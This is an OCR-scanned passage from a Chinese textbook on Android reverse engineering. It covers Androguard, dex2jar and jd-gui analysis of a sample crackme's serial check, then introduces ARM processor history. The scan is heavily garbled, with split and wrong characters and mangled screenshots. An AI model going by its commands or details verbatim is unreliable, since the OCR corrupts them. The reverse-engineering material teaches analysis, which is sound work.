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图 5-21 dex 文件 对 象 可 用 的 方法 


接 下 来 是 分 析 结 果 对 象 的 获取 ， 执 行 以 下 命令 。 





dx = VMAnalysis (d) 
VMAnalysis() 执 行 返 回 后 将 分 析 结 果 对 象 赋 给 dx，dx 可 用 的 方法 较 
少 ， 如 图 5-22 所 示 。 
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3]: dx = VMAnalysis(d) 


dx. 
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图 5-22 ”结果 对 象 可 用 的 方法 


使 用 3 条 命令 获取 3 个 对 象 的 方法 比较 麻烦 ，Shell 环 境 下 可 以 执行 以 


下 命令 一 次 获取 这 3 个 对 象 。 
a, d, dx = AnalyzeAPK("./crackme0502.apk", decompiler="dad") 


AnalyzeAPK( 一 次 性 完成 上 面 介 绍 的 3 个 方法 调用 ， 其 中 decompiler 
指定 反 编 译 器 的 名 称 ，Androguard 自 带 并 有 旦 默 认 使 用 dad 作 为 dex 文 件 的 
反 编 译 器 。 

在 获得 这 3 个 对 象 后 ， 我 们 看 看 如 何 使 用 它们 来 分 析 Android 程 序 。 
首先 我 们 碍 看 apk 文 件 的 信息 ， 可 以 执行 ashowO， 该 命令 执行 后 会 输出 
apk 压 缩 包 中 所 有 的 文件 信息 。 我 们 也 可 以 执行 afiles 命 令 获 得 相近 的 输 
出 结果 。 还 可 以 执行 

a.get_permissions(): 输出 apk 用 到 的 全 部 权限 。 

a.get_providers(): 输出 程序 中 所 有 的 Content Provider。 

a.get_receivers(): 输出 程序 中 所 有 的 Broadcast Receiver。 

a.get_services(): 输出 程序 中 所 有 的 Service。 


其 它 的 命令 读者 可 以 自己 手动 尝试 运行 一 表 。 接 着 是 dex 文 件 对 











象 。 访 对象 保 存 了 dex 文 件 中 所 有 的 类 、 方 法 、 字 段 的 信息 ， 这 些 信 息 
都 是 以 对 象 的 方式 进行 提供 的 ， 而 且 都 以 .CLASS_ 开 头 。 例 
如 “d.CLASS_Laaa_bbb_ccc”， 表 示 dex 文 件 中 的 aaa.bbb.ccc 类 。 方 法 的 名 
称 是 在 类 名 称 后 添加 以 METHOD 开头 的 方法 字符 串 ， 例 
如 “d.CLASS_Laaa_bbb_ccc.METHOD ddd_Ljava_lang_StringV”， 表 示 
aaa.bbb.ccc 类 的 “void ddd(String)” 方 法 。 字 段 的 名 称 是 在 类 名 称 后 添加 以 
FIELD_ 开头 的 字段 声明 字符 串 ， 例 
如 “d.CLASS_Laaa_bbb_ccc.FIELD _this_0”， 表 示 aaa.bbb.ccc 类 的 this$0 字 
段 。 

按照 上 面 的 命名 规则 ， 我 们 查看 MainActivity$2 的 OnClick() 方 法 ， 
执行 以 下 命令 。 


d.CLASS Lcom droider crackme0502 MainActivity_ 2.METHOD onClick.pretty_show!() 


pretty_show() 用 来 显示 onClick 0 方法 的 代码 ， 如 图 5-23 所 示 。 





@O@O@ android@ubuntul0: ~/tools/androguard 
File Edit View Terminal Help 


13]: d.CLASS Lcom droider crackme0562 MainActivity 2.METHOD onCLick.pretty s 

how!( ) 
柑 音 #### 帮 并 ##### 洒 Method Information 
Lcom/droider/crackme9502/MainActivitys$2; ->onCtick(Landroid/view/View;)V [access 
flags=public] 
并 下 浊 浊 六 浊 ####### Params 
- local registers: vO...v4 
- V5:android.view.View 

return:void 
闪 检 本 准许 放 检 可 检 本 放 放 放 酝 检 检 放 放 桩 内 


计 率 守 计 半 守 守 襟 守 计 计 守 守 计 计 计 计 守 守 守 宗 守 本 宁 守 守 计 


0 ( ) new-instance vo, Lcom/droider/crackmeQ502/MainActi 
VIity$SNChecker; 

人 ) iget-object V2，V4，Lcom/droider/crackme0502/Main 
Activity$2; ->this$g Lcom/droider/ycrackme65602/MainActivity; 

人 ) iget-object V3，Vv4，Lcom/droider/vcrackme9502/7Main 
Activity$2; ->this$9 Lcom/droider/crackme6562/MainActivity; 

~ ) invoke-static v3, Lcom/droider/crackmeQ502/MainActi 
vity;->access$l(Lcom/droider/crackmeQ502/MainActivity;)Landroid/widget/EditText; 

4 | ) move-result-object v3 

-el ) invoke-virtual v3, Landroid/widget/EditText;->getTex 
t()Landroid/text/Editable; 

6 (| ) move-result-object v3 

J ) invoke-interface v3, Landroid/text/Editable;->toString 
()Ljava/Lang/String; 

8 ( ) move-result-object v3 

9 ( ) invoke-direct vO, v2, v3, Lcom/droider/crackmeQ582/ 
MainActivity$SNChecker; -><init>(Lcom/droider/crackme0582/MainActivity; Ljava/lan 
g/String; )V 

:| ) invoke-virtual vO, Lcom/droider/crackmeQ502/MainActi 
vity$SNChecker; ->isRegistered!()Zz 

11 ( ) move-result V2 

| ) if-eqz V2, +15 


13 ! ) const-string V1, '\xe6\xb3\xa8\xeS5\x86\x8c\xe7\xag 
\x81\xe6\xad\xa3\xe7\xal\xae' 








! 





图 5-23 ”MainActivity$2 的 OnClick() 方 法 


在 代码 的 最 下 面 ， 有 如 下 一 段 内 容 。 


大 ## 提 提 提 ### 提 提 # XREF 

T: Lcom/droider/crackme0502/MainActivity; accessS1 
(Lcom/droider/crackme0502/MainActivity;)Landroid/widget/EditText; c 

T: Lecom/droider/crackme0502/MainActivity$SNChecker; <init> 
(Lecom/droider/crackme0502/MainActivity; Ljava/lang/String;)V 24 

T: Lcom/droider/crackme0502/MainActivity$SNChecker; isRegistered (})Zz 2a 

## 提 扩 社 扩 提 社 社 扩 提 并 社 扩 提 并 坟 宁 提 并 社 


上 上面 的 代码 为 方法 的 交叉 引用 区 ， 开 头 的 字母 T 表 示 后 面 指定 的 方 
法 被 本 方法 引用 ， 除 此 之 外 ， 它 还 可 以 是 字母 F， 表 示 本 方法 被 其 它 的 
方法 所 引用 。 

除了 使 用 pretty_show0) 显 示 反 汇编 代码 外 ， 还 可 以 使 用 source() 直 接 
显示 Java 源 码 ， 不 过 笔者 本 机 并 未 测试 成 功 。 

最 后 是 dx 对 象 ， 它 可 以 实现 字符 串 、 字 7 段 、 方 法 、 包 名 的 搜索 ， 使 
用 方法 如 下 。 

dx.tainted_variables.get_string(< 要 搜索 的 字符 串 >) 

show_Path(d, dx.tainted_packages.search_packages(< 包 名 >)) 

这 两 个 方法 是 Androguard 作 者 在 wiki 页 上 公布 的 ， 笔 者 本 机 并 未 测 
试 成 功 。 

androlyze.py 的 其 它 的 功能 笔者 就 不 介绍 了 ， 读 者 可 以 自己 动手 多 
试 。 同 时 ， 从 本 节 对 Androguard 的 使 用 介绍 中 可 以 看 出 ， 目 前 
Androguard 在 兼容 性 与 稳定 性 方面 有 竺 加强 。 























5.8 其 它 静 态 分 析 工 具 


在 静态 分 析 Android 程 序 时 ， 除 了 使 用 IDA Pro 与 Androguard 外 ， 还 
有 很 多 其 它 的 静态 工具 。 它 们 大 多 是 以 ApkTool、BakSmali、JAD 与 
Androguard 为 基础 ， 进 行 扩 展 实 现 的 ， 其 中 就 包括 一 款 名 为 
ApkInspector 的 静态 分 析 工 具 。ApkInspector 由 国人 郑 聪 开发 ， 拥 有 类 似 
IDA ”Pro 的 流程 图 显示 功能 ， 文 持 反 汇编 代码 语法 高 宫 、 字 人 符 串 搜 索 、 
函数 和 变量 重 命名 。 它 是 honeynet 2011 中 的 一 个 项 目 ， 在 2011 年 的 
GSOC (Google Summer Of Code) 中 该 软件 表现 突出 。 今 年 的 
GSOC2012 上 该 工具 有 提出 更 新 与 改进 ， 不 过 目前 仍 未 有 它 的 更 新 版 本 
可 供 下 载 ， 访 软件 的 安装 配置 过 程 比 较 繁 琐 ， 笔 者 在 此 不 介绍 它 的 使 
用 ， 感 兴趣 的 读者 可 以 访问 它 的 项 目 主页 
https://bitbucket.org/ryanwsmith/apkinspector 获 取 到 它 。 











5.9 阅读 反 编 译 的 Java 代 三 


在 分 析 大 型 软件 时 ， 为 了 和 弄 清 程序 的 结构 框架 ， 需 要 花费 掉 大 量 的 
时 间 与 精力 来 阅读 smali 代 码 ， 这 无 疑 是 分 析 成 本 的 一 大 开销 。 然 而 ， 
Android 程 序 大 多 数 情况 下 是 采用 Java 语 言 开 发 的 ， 传 统 意义 上 的 Java 反 
汇编 工具 依然 能 够 派 上 用 场 。 


5.9.1 ”使 用 dex2jar 生 成 jar 文 件 


在 第 4 章 中 介绍 Android 程 序 生 成 步 又 时 曾经 讲 到 过 ， 生 成 apk 文 件 
的 其 中 一 个 环节 束 是 将 Java 语 言 的 字 节 人 码 转换 成 Dalvik 虚 拟 机 的 字 节 
码 。 那 么 ， 这 个 转换 的 过 程 可 逆 吗 ? 答案 是 : 可 以 的 。 使 用 开源 的 
dex2jar 工 具 即 可 。 

dex2jar 的 官网 是 http:/code.google.comy/p/dex2jar/， 目 前 最 新 版 本 为 
0.0.9.9， 将 下 载 下 来 的 dex2jar 压 缩 包 解压 ， 然 后 将 解压 后 的 文件 夹 添加 
到 系统 的 PATH 环境 变量 中 ， 在 命令 提示 符 下 输入 以 下 命令 : 

d2j-dex2jJar xxx.apk 

稍 等 片刻 就 会 在 同 目录 下 生成 一 个 jar 文 件 。dex2jar 是 一 个 工具 包 ， 
除了 提供 dex 文 件 转换 成 jar 文 件 外 ， 还 提供 了 一 些 其 它 的 功能 ， 每 个 功 
能 使 用 一 个 bat 批 处 理 或 sh 脚本 来 包装 ， 只 需 在 Windows 系 统 中 调用 bat 文 
件 、 在 Linux 系 统 中 调用 sh 脚本 即 可 。 

d2j-apk-sign 用 来 为 apk 文 件 签名 。 命 令 格 式 : d2j-apk-sign xxx.apk。 

d2j-asm-verify 用 来 验证 jar 文 件 。 命 令 格 式 : d2j-asm-verify -d 
XXX.jar。 

d2j-dex2jar 用 来 将 dex 文 件 转换 成 jar 文 件 。 命 令 格式 : d2j-dex2jar 


XXX.apK 














d2j-dex-asmifier 用 来 验证 dex 文 件 。 命 令 格式 : d2j-dex-asmifier 
XXX.deX。 

d2j-dex-dump 用 来 转 存 dex 文 件 的 信息 。 命 令 格式 : d2j-dex-dump 
XXX.apk out.jar。 

d2j-init-deobf 用 来 生成 反 泥 清 jar 文 件 时 的 初始 化 配置 文件 。 

d2j-jar2dex 用 来 将 jar 文 件 转换 成 dex 文 件 。 命 令 格式 : d2j-jar2dex 
XXX.apK。 

d2j-jar2jasmin 用 来 将 jar 文 件 转换 成 jasmin 格 式 的 文件 。 命 令 格式 : 
d2j-jar2jasmin xxx.jar 

d2j-jar-access 用 来 修改 jar 文 件 中 的 类 、 方 法 以 及 字段 的 访问 权限 。 

d2j-jar-remap 用 来 重 命名 jar 文 件 中 的 包 、 类 、 方 法 以 及 字段 的 名 
称 。 

d2j-jasmin2jar 用 来 将 jasmin 格 式 的 文件 转换 成 jar 文 件 。 命 令 格 式 : 
d2j-jasmin2jar dir 

dex2jar 为 d2j-dex2jar 的 副本 。 

dex-dump 为 d2j-dex-dump 的 副本 。 


5.9.2 ”使 用 jd-gui 人 查看 jar 文 件 的 源码 


为 了 达到 源码 级 的 反 编译 效果 ， 可 以 使 用 Java 反 编译 工具 JAD 将 jar 
文件 转换 成 Java 源 文件 ， 目 前 JAD 官网 已 经 无 法 访问 ， 可 以 通过 
http://www.varaneckas.com/jad/ 下 载 到 JAD 的 可 执行 文件 。 

在 这 里 ， 笔 者 推荐 使 用 jd-gui。jd-gui 是 一 款 用 C++ 开 发 的 Java 反 编 
译 工 具 ， 文 持 Windows、Linux 和 苹果 Mac ”OS 三 个 平台 。jd-gui 是 免费 
的 ， 而 且 反 编译 效果 不 错 ， 该 工具 省 挥 了 将 jar 文 件 转换 成 Java 源 文件 的 
步 又， 直接 以 源码 的 形式 显示 jar 文 件 中 的 内 容 ， 可 以 从 官方 免费 获取 。 
官方 主页 为 : http://java.decompiler.free.fr/，jd-gui 运 行 后 效果 如 图 5-24 所 
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crackme-dex2jar-jar2jasmin-jasmin2jar.jar x 
| 密 android | 
1 击 com. droider 

四- 南 wanno 

日 宙 craclme0502 
四- 国 Builaconfig 
因 NainAectivity 
-© Nainkctivity 

© SNChecker 
9 sn ; String 
© SHChecker (Strine) 
© ishegistered() : boolean 
btnAnno ; Button 
btnCheckSN : Button 
edtSH : EditText 
BatAnnotations () 
onCreate (Bundle) 
onCreateDptionsllenu Menu) : 





加 图 


‘ void 
void 


四 和 国 0o 


bool 
由 - 因 HyApp 


由 - 因 











BuildConfig.class 





Mai ivity.class x a 
} 人 ~ 
catch (Exception localException) 有 
{ 

while (true) 
localException.printStackTrace (); 
} 
} 


public void onCreate (Bundle paramBundle) 
{ 
super.onCreate (paramBundle); 
setContentView (2130903040); 
this.brnhnno = ((Button) findViewById(2131230720)); 
this.btnCheckSN = ((Button)findViewById(2131230722)); 
this.edtSN = ((EditText)findViewById(2131230721)); 
this.btnAnno. setOnClickListener (new View.OnClickListener() 
| 
public void onClick (View paramView) 
{ 2 
MainActivitry.this.getAnnotations (); 
} 
1); 
this.btnCheckSN.setOnClickListener (new View.OnClickListener() 
{ 
public void onClick (View paramView) 
{ 
if (new MainActivity.SNCheck 
for (String str = "注册 码 正确 
{ 
Toast.makeText (MainActivity.this, str, 
return; 
} 
} 
D3; 
} 











MainActivit 
7 str= 






this, MainActivity.this.edtSN.getText() .toString()) .isRegistered()); 
玛 错误 ") 












0) .show() 


public boolean onCreateOptionsMenu (Menu paramMenu) 





图 5-24 ”使 用 jd-gui 查 看 jar 文 件 的 源码 


除了 反 编 译 功能 外 ，jd-gui 还 带 有 强大 的 搜索 功能 ， 在 主 界面 按 下 
快捷 键 CTRL+F， 会 在 程序 的 状态 栏 显 示 一 个 搜索 工具 条 ， 输 入 要 搜索 
的 内 容 ， 当 前 打开 的 反 编 译 窗 口 会 高 亮 显示 搜索 结果 。 除 此 之 外 ， 点 击 
菜单 项 “Search ,Search” 会 弹出 搜索 对 话 框 ， 如 图 5-25 所 示 ， 搜 索 框 列举 
出 了 isRegistered() 方 法 在 哪些 文件 中 被 引用 过 。 











Search 


Search string (* = any string, ? = any character): 


| isRegistered 


Search For Limit TO 
DType [DConstructor String Constant Declarations 
器] Field Method References 





3 matching tems: 





站 D:\workspace\chapter5\5.9\5.9.1\crackme-dex2jarjar2jasmin-jasmin; 
日- 出 com.droider.crackme0502 

[| MainActivity.SNChecker 

四 MainActivity 


四 MyApp 











图 5-25”jd-gui 的 搜索 功能 


5.10 ”集成 分 析 环 境 


本 章 的 前 面部 分 介绍 的 Android 静 态 分 析 工 具 包 括 ApkTool、 
BakSmali、Androguard、dex2jar、jd-gui， 这 些 工 具 中 除了 Androguard 不 
能 在 Windows 平 台 上 运行 外 ， 其 它 的 都 能 文 持 跨 平 台 ， 可 以 在 Windows 
平台 上 展 好 的 运行 。 

如 果 读 者 觉得 单独 下 载 配 置 这 些 工 具 麻 烦 (其实 本 书 配 套 源 代码 中 
有 提供 ) ， 不 妨 使 用 男 一 球 集 成 分 析 环 境 santoku。santoku 实 质 是 一 丈 
定制 的 Ubuntu 12.04 系 统 镜像 ， 与 其 它 Ubuntu 系 统 相 比 ， 它 具有 如 下 特 
占 ， 

1. 集成 了 大 量 主流 的 Android 程 序 分 析 工 具 ， 为 分 析 人 员 节 省 分 析 
环境 配置 所 需 的 时 间 。 

2. 集成 移动 设备 取证 工具 。 文 持 Android、IPhone 等 移动 设备 的 取 
Wl 

3. 集成 渗透 测试 工具 。 

4. 集成 网 络 数据 分 析 工 具 。 在 分 析 Android 病 毒 、 木 马 等 程序 时 ， 
这 些 工 具 特 别 有 用 。 

5. 采用 LXDE 作 为 系统 的 加 面 环 境 ， 界 面 与 Windows ”XP 非常 相 
似 ， 符 合 中 国人 使 用 习惯 。 

6. 正 处 于 beta 阶 段 ， 但 整个 项 目 显得 很 有 活力 ， 相 信 将 来 的 更 新 和 
维护 也 会 不 错 。 

santoku 的 初衷 是 为 了 提供 一 套 完整 的 移动 设备 司法 取证 环境 。 但 很 
显然 它 集成 的 Android 程 序 分 析 工 具 ， 会 给 我 们 的 分 析 工 作 天 来 很 多 便 
捷 。santoku-linux 的 官方 网 站 为 https:/santoku-linux.com， 目 前 最 新 版 本 
alpha 0.3。 如 图 5-26 所 示 ，santoku-linux 启 动 后 的 界面 非常 清新 。 
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图 5-26 ”santoku-linux 启 动 界面 


如 果 读 者 还 在 为 安装 配置 Androguard 烦 恼 的 话 ， 不 妨 下 载 安 装 
santoku 试 试 ， 目 前 它 集 成 的 Androguard 版 本 为 1.5， 虽 然 不 是 最 新 版 本 ， 
但 通过 它 可 更 新 到 1.6 版 ， 只 需 下 载 Androguard 的 源码 后 ， 修 改 两 个 库 文 
件 的 makefile (详细 位 置 请 参考 Androguard 安 装 方法 ) ， 然 后 执行 一 次 
make 命 令 即 可 。 

santoku 详 细 的 安装 与 使 用 方法 笔者 就 不 介绍 了 人 ， 它 里 面 集成 的 大 多 
数 静 态 分 析 工 具 在 前 面 的 章节 中 都 已 经 介绍 过 了 ， 相 信 读 者 也 都 已 经 学 
握 了 。 


5.11 本 章 小 结 


静态 分 析 是 软件 分 析 过 程 中 最 基础 也 是 最 重要 的 一 种 手段 ， 本 章 主 
要 从 Android 程 序 的 特点 、smali 文 件 的 代码 结构 、 静 态 分 析 工 具 的 使 用 
等 儿 个 方面 来 介绍 如 何 分 析 一 个 完整 的 Android 程 序 。 对 于 刚 接 触 
Android 程 友 分 析 的 读者 来 说 ， 建 议 多 阅读 有 反 编 译 后 的 smali 文 件 ， 而 不 
是 直接 使 用 jd-gui 等 工具 来 阅读 Java 源 码 ， 这 样 有 助 于 提高 反 编 译 代 码 的 
阅读 能 力 ， 以 后 分 析 混 消 过 的 APK 文 件 或 者 jd-gui 派 不 上 用 场 时 就 不 至 
于 手足 无 措 。 





第 6 音 基于 Android 的 ARM 汇 编 
语言 基础 也 回 原生 ! 


谈 到 学 习 ARM 汇 编 语 言 ， 许 多 读者 心中 可 能 会 有 一 个 疑问 。 为 什 
么 一 本 讲 Android 安 全 的 书籍 会 涉及 到 ARM 汇 编 语 言 知识 ?关于 这 个 问 
题 我 将 在 后 面 的 6.2.1 节 中 作 说 明 。 

阅读 本 书 的 读者 可 能 曾经 有 过 Windows 或 Linux 平 台 软 件 开 发 的 经 
验 ， 也 可 能 是 从 未 涉足 其 它 平台 ， 只 是 纯粹 的 Android 程 序 员 。 本 书 不 
假定 读者 有 任何 的 汇编 语言 基础 ， 如 x86 汇 编 与 AT&T 汇 编 。 如 果 读 者 
曾经 学 习 过 ARM 汇 编 语言 ， 可 以 跳 过 本 章 直接 学 习 下 一 章 ， 而 如 果 您 
之 前 未 曾 接 触 过 ARM 汇 编 语言 ， 也 不 要 感到 泪 背 ， 因 为 接 下 来 笔者 将 
会 从 掌握 原生 程序 逆向 技术 的 角度 出 发 ， 带 领 大 家 一 起 学 习 ARM 汇 编 
的 基础 知识 。 











6.1 Android 与 ARM 人 处 理 器 


本 节 主 要 介绍 ARM 人 处理 器 的 发 展 史 ， 以 及 Android 系 统 与 ARM 人 处理 
器 的 关系 。 


6.1.1 ARM 处 理 器 架构 概述 


ARM 是 Advanced RISC Machine 的 首 字 母 缩 写 。 在 开发 人 员 的 眼 
中 ，ARM 可 以 称 之 为 一 家 先入 式 处 理 器 的 提供 商 ， 也 可 以 理解 为 一 种 
处 理 器 的 架构 ， 还 可 以 将 它 当 作 一 套 完 整 的 处 理 器 指令 集 。 

ARM 公 司 有 着 悠久 的 历史 。 起 先 它 只 是 艾 康 电脑 公司 于 1983 年 开 
始 的 一 个 开发 计划 ，1985 年 艾 康 电脑 设计 出 了 第 一 代 32 位 的 处 理 器 ， 采 
用 了 精简 指令 集 ， 简 称 为 ARM (Acorn RISC Machine) ， 同 年 的 4 月 26 
日 ， 美 国 的 VLSI 公司 生产 出 了 第 一 条 Acorn RISC 处 理 器 ， 这 就 是 ARMI1 
处 理 器 。1986 年 ARM2 问 世 ，ARM2 有 具有 32 位 的 数据 总 线 、26 位 的 寻 址 
空间 ， 并 提供 64 MB 的 寻 址 范围 与 16 个 32 位 的 暂 存 器 ， 它 是 第 一 块 被 量 
产 的 ARM 架 构 的 处 理 器 。1989 年 ARM3 问 世 ， 它 采用 了 4KB 的 高 速 绥 
存 ， 性 能 较 前 两 个 版 本 有 很 大 的 突破 。1990 年 ，ARM 获 得 苹果 公司 与 
VLSI 公司 的 资助 ，Acorn RISC Machine 也 正式 更 名 为 Advanced RISC 
Machine， 从 此 ，ARM 成 为 了 一 家 独立 的 处 理 器 公司 。1998 年 4 月 17 
日 ，ARM 公 司 在 英国 伦敦 证 交 所 和 美国 纳 斯 达 克 上 市 。 之 后 的 ARM 公 
司 迅 狐 发 展 ， 截 至 2007 年 底 ，ARM 核 心心 片 出 货 量 已 突破 100 亿 颗 ， 这 
也 葛 定 了 ARM 在 舱 入 式 及 移动 蕊 片 领域 的 王者 地 位 。 


6.1.2 ”ARM 处 理 器 家 族 


为 了 满足 不 同 环境 下 的 需求 ，ARM 公 司 推出 了 各 种 各 样 基 于 通用 
染 构 的 处 理 器 。 如 图 6-1 所 示 ， 整 个 ARM 处 理 器 家 族 分 成 Classic、 
Embedded、Application 三 大 类 。 
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图 6-1 ARM 处 理 器 家 族 


Classic 被 称 为 经 典 系 列 ， 早 先 基于 ARM 架 构 的 处 理 器 以 数字 命名 ， 
这 种 命名 方式 一 直 从 ARM1 延 续 到 ARM11， 从 ARM11 之 后 ， 没 有 再 采 
用 数字 来 命名 处 理 器 的 版 本 ， 而 是 采用 Cortex 来 命名 ， 当 时 还 有 人 说 
Cortex 就 是 ARM12。Cortex 型 号 的 处 理 器 分 为 三 个 系列 : Cortex-A、 
Cortex-M 与 Cortex-R。 

Cortex-A 系 列 的 处 理 器 被 广泛 应 用 于 智能 手机 、 上 网 本 、 电 子 书 以 
及 数字 电视 等 常见 的 电子 设备 ， 本 书 讨论 的 Android 以 及 其 它 主流 的 手 
机 系统 大 部 分 都 使 用 它 。 目 前 ， 市 场 上 大 部 分 Android 手 机 采用 Cortex- 
A8 处 理 妖 ， 部 分 高 端的 手机 或 平板 设备 甚至 采用 了 Cortex-A9 或 Cortex- 
A15 处 理 器 。Cortex-M 系 列 处 理 器 主要 是 针对 微 控 制 占 领域 开发 的 ， 访 


系列 的 设计 理念 是 高 能 效 、 低 功 耗 ， 其 中 Cortex-M3 为 比较 经 典 的 版 
本 。Cortex-R 系 列 处 理 需 主要 面 辣 深层 供 入 式 实 时 应 用 ， 对 低 功 耗 、 民 
好 的 中 断 行 为 、 蛙 越 性 能 以 及 与 现 有 平台 的 高 兼容 性 这 些 需求 进行 了 平 
衡 考 虑 。 

尽管 ARM 染 构 的 处 理 右 版 本 众多 ， 但 其 中 很 多 版 本 的 处 理 器 架构 
是 相同 的 ， 相 同 版 本 的 处 理 器 兼容 同一 套 ARM 指 令 集 。 目 前 ，ARM 架 
构 与 处 理 器 家 族 对 照 如 表 6-1 所 示 。 


表 6-1 _ ARM 处 理 器 家 族 





























| 架构 处 理 器 家 族 

ARMvVv1 

ARMV2 

ARMV3 

ARMv4 StrongARM、ARM7TDMI、ARM9TDMI 

ARMVv6 ARM11、ARM Cortex-M 

ARMV7 ARM Cortex-A、ARM Cortex-M、 ARM Cortex-R 
| ARMv8 尚未 有 商品 问世 。 预 计 文 持 64 位 的 数据 与 寻 址 





可 以 发 现 ， 跨 度 比较 大 的 是 ARM7， 不 同型 号 的 ARM7 处 理 器 有 v3- 
V5 三 种 架构 。 从 ARMv4 版 本 以 后 ， 加 入 了 一 种 16 位 指令 模式 ， 叫 做 
Thumb。Thumb 指 令 集 可 以 看 作 是 ARM 指 令 压 缩 形式 的 子 集 ， 具 有 16 位 
的 代码 密度 。Thumb 指 令 体系 并 不 完整 ， 只 支持 通用 功能 ， 必 要 时 仍 需 
要 使 用 ARM 指 令 。ARMv5 加 入 了 VFPV2 与 Jazelle 技 术 ，VFP 为 ARM 架 
构 的 处 理 器 提供 了 浮 点 运算 能 力 ，Jazelle 技 术 允 许 在 某 些 架 构 的 硬件 上 
加 速 运行 Java bytecode。 在 讲解 Android 系 统 的 Dalv 这 虚拟 机 时 曾经 说 
过 ，Dalvik 虚 拟 机 并 非 使 用 传统 的 JYVM 来 运行 Android 程 序 ， 而 是 自己 实 
现 了 一 套 字 节 码 加 载 与 运行 机 制 ， 因 此 ， 这 项 技术 对 Android 是 没有 任 
何 用 处 的 。ARMv6 加 入 了 Thumb-2 技 术 文 持 ，Thumb-2 扩 充 了 受 限 的 16 
位 Thumb 指 令 集 ， 以 额外 的 32 位 指令 让 指令 集 的 使 用 更 广泛 ， 除 此 之 





外 ，ARMv6 加 入 了 SIMD 与 TrustZone 技 术 ， 新 的 SIMD 多 媒体 指令 扩展 
可 适用 于 众多 软件 应 用 领域 ， 如 视频 和 音频 编 解 码 ， 使 得 在 处 理 音频 和 
视频 时 ， 性 能 提高 了 75% 以 上 ，TrustZone 技 术 为 ARM 加 入 了 安全 性 控 
制 ， 避 免 产 品 受 到 外 部 的 恶意 攻击 ， 目 前 并 未 发 现 Android 系 统 中 引入 
该 项 技术 。ARMv7 加 入 了 VFPv3 与 NEON 支 持 ，NEON 技 术 为 SIMD 体 系 
结构 的 扩展 ， 被 称 为 Advance SIMD，NEON 在 执行 上 比 传 统 SIMD 占 用 
更 少 的 指令 周期 ， 性 能 方面 得 到 了 大 幅度 的 提供 ， 男 外 ，NEON 加 入 了 
许多 多 媒体 格式 的 硬 解码 ， 如 MPEG-4、H.264 等 ， 这 使 得 ARMv7 在 多 
媒体 应 用 方面 获得 更 好 的 用 户 体 验 。 最 后 是 ARMv8， 该 系列 的 处 理 器 
尚未 有 产品 上 市 ， 但 可 以 通过 ARM 官 方 网 站 了 解 该 架构 的 一 些 情况 。 
ARMv8 除 了 完整 的 加 下 指令 集 兼 容 外 ， 还 提供 了 32 位 与 64 位 两 种 执行 
状态 ， 也 就 是 说 ， 从 ARMv8 起 ，ARM 架 构 的 处 理 器 进入 了 64 位 时 代 ， 
指令 集 方面 ，ARMv8 提 供 了 A32 的 ARM 指 令 集 、T32 的 Thmub 指 令 集 以 
及 A64 的 AArch64 指 令 集 。 








6.1.3 Android 支 持 的 处 理 器 架构 


Android 最 人 切 选 择 了 ARM 作 为 平台 设备 的 处 理 器 架构 。 人 查看 Android 
系统 源码 的 Bionic 库 以 及 Dalvik 虚 拟 机 的 实现 ， 可 以 发 现 Android 专 门 针 
对 ARM 平 台 做 了 不 少 优 化 。 查 看 各 版 本 Android 源 人 码 的 dalvik/vm/mterp 
目录 ， 可 以 发 现 Android 1.6 版 本 中 只 支持 armv4 与 armv5te 指 令 集 ， 到 了 
Android 2.0 增 加 了 arm-vfp、armv6 与 armv6t2 指 令 集 ， 到 了 Android 2.2 增 
加 了 armv7-a 指 令 集 。 

在 处 理 器 架构 方面 ，Google 从 一 开始 就 没 打算 将 筹码 完全 压 在 
ARM 身 上 ， 从 Android1.6 开 始 ，Dalvik 虚 拟 机 就 提供 了 对 x86 架 构 的 支 
持 。 到 了 Android 2.2， 加 入 了 对 x86-atom 的 支持 ，atom 是 Intel 专 为 移动 
设备 开发 的 一 球 微 型 处 理 器 ， 这 也 是 Intel 争 夺 移动 市 场 近 出 的 第 一 步 ， 


这 球 处 理 嚣 中文 命名 为 “ 凌 动 "目前 市 场 上 已 经 能 够 看 到 基于 它 的 
Android 手 机 与 上 网 本 了 。 截 止 目前 最 新 的 Android 4.1， 加 入 了 对 MIPS 
的 支持 。 因 此 ， 如 今 的 Android 支 持 ARM、x86、MIPS 三 种 架构 的 处 理 
可 

不 同 的 架构 会 涉及 不 同 的 知识 面 ， 本 书 不 可 能 对 每 一 种 架构 的 知识 
进行 完全 的 细致 讲解 ， 因 为 这 些 都 是 相应 的 处 理 器 手册 所 做 的 事情 。 本 
书 选择 了 目前 最 为 流行 的 ARM 架 构 ， 通 过 介绍 常用 的 ARM 指 令 及 其 语 
法 ， 为 没有 ARM 基 础 的 读者 做 一 个 简单 的 科普 ， 为 下 一 章 Android 原 生 
程序 的 逆 问 做 好 准备 。 如 果 读 者 对 其 它 两 种 处 理 器 架构 或 相关 的 指令 集 
系统 感 兴趣 ， 可 以 访问 相应 的 处 理 器 官方 网 站 进行 了 解 。 








6.2 原生 程序 与 ARM 汇 编 语 言 一 逆 癌 你 的 原生 
Hello ARM 


本 小 节 主 要 介绍 原生 程序 与 ARM 汇 编 语 言 的 关系 ， 让 读者 认识 到 
ARM 汇 编 语 言 在 原生 程序 分 析 过 程 中 的 重要 性 。 


6.2.1 原生 程序 逆向 初步 


有 过 Java 开 发 经 验 的 读者 一 定 会 知道 ，Java 程 序 的 安全 多 依赖 于 代 
码 混 消 技术 ， 这 种 技术 通过 更 改 程序 中 的 方法 、 字 段 名 来 增加 静态 分 析 
的 难度 ， 从 而 达到 防止 程序 被 破解 的 目的 。Android 系 统 采 用 Java 作 为 其 
平台 软件 的 基础 开发 语言 ， 代 码 混 请 技术 也 理所当然 的 成 为 了 保护 程序 
的 “基础 ?手段 。 但 代码 混 请 技术 也 有 很 多 弊端 〈 有 具体 的 代码 混淆 技术 会 
在 本 书 第 十 章 进 行 介绍 ) ， 不 能 满足 对 安全 需求 较 高 的 行业 及 商业 软 
件 ，Android NDK 的 问世 ， 使 得 开发 人 员 可 以 通过 C/C++ 代 码 来 编写 软 
件 的 核心 功能 代码 ， 这 些 代码 通过 编译 会 生成 基于 特定 处 理 器 的 可 执行 
文件 ， 对 于 使 用 ARM 处 理 器 的 Android 手 机 来 说 ， 它 最 终 会 生成 相应 的 
ARM elf 可 执行 文件 ， 分 析 人 员 要 想 分 析 软 件 的 核心 功能 只 能 从 这 个 elf 
文件 入 手 。 然 而 分 析 ARM elf 文 件 比 想象 中 要 困难 的 多 ， 摆 在 分 析 人 员 
面前 的 首要 问题 就 是 需要 对 ARM 指 令 集 有 所 了 解 ， 因 为 无 论 是 静态 分 
析 还 是 动态 调试 ARM elf 代 码 都 需要 具备 基本 的 ARM 反 汇编 代码 阅读 能 
